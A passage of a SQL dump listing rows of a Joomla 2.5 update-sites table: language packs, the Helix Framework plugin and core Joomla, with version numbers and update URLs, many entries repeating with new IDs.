Unitag','','pkg_ar-AA','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1461,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1462,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1463,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1464,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1465,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1466,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.27.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1467,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1468,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1469,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1470,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1471,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1472,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1473,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1474,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1475,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1476,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1477,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1478,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1479,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1480,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1481,1,0,0,'Joomla','','joomla','file','',0,'2.5.27','','http://update.joomla.org/core/extension.xml',''),(1482,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1483,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.26.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1484,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1485,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1486,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1487,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1488,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1489,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1490,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1491,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1492,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1493,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1494,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1495,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1496,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1497,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1498,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1499,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1500,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1501,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1502,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1503,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.27.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1504,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1505,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1506,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1507,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1508,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1509,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1510,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1511,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1512,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1513,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1514,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1515,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1516,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1517,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1518,1,0,0,'Joomla','','joomla','file','',0,'2.5.27','','http://update.joomla.org/core/extension.xml',''),(1519,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1520,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.26.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1521,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1522,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1523,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1524,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1525,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1526,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1527,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1528,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1529,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1530,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1531,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1532,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1533,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1534,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1535,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1536,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1537,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1538,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1539,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1540,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.27.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1541,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1542,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1543,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1544,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1545,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1546,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1547,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1548,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1549,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1550,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1551,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1552,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1553,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1554,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1555,1,0,0,'Joomla','','joomla','file','',0,'2.5.27','','http://update.joomla.org/core/extension.xml',''),(1556,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1557,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.26.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1558,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1559,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1560,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1561,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1562,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1563,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1564,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1565,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1566,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1567,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1568,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1569,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1570,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1571,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1572,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1573,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1574,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1575,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1576,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1577,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.27.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1578,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1579,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1580,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1581,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1582,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1583,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1584,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1585,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1586,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1587,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1588,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1589,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1590,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1591,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1592,1,0,0,'Joomla','','joomla','file','',0,'2.5.27','','http://update.joomla.org/core/extension.xml',''),(1593,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1594,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.26.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1595,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1596,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1597,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1598,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1599,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1600,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1601,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1602,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1603,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1604,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1605,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1606,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1607,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1608,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1609,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1610,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1611,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1612,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1613,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1614,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.27.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1615,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1616,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1617,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1618,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1619,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1620,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1621,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1622,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1623,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1624,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1625,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1626,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1627,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1628,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1629,1,0,0,'Joomla','','joomla','file','',0,'2.5.27','','http://update.joomla.org/core/extension.xml',''),(1630,1,0,0,'Joomla','','joomla','file','',0,'2.5.27','','http://update.joomla.org/core/extension.xml',''),(1631,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1632,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1633,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.26.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1634,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.26.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1635,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1636,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1637,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1638,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1639,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1640,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1641,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1642,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1643,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1644,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1645,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1646,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1647,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1648,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1649,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1650,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1651,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1652,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1653,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1654,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1655,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1656,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1657,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1658,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1659,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1660,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1661,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1662,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1663,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1664,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1665,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1666,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1667,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1668,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1669,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1670,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1671,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1672,3,0,0,'Serbian 